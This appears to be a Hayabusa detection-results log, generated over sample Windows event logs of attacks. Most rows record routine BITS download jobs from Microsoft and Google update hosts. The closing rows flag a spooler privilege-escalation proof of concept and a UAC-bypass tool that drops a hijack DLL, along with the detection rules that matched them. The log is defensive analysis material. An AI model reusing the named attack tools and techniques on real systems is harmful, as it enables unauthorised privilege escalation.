+2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
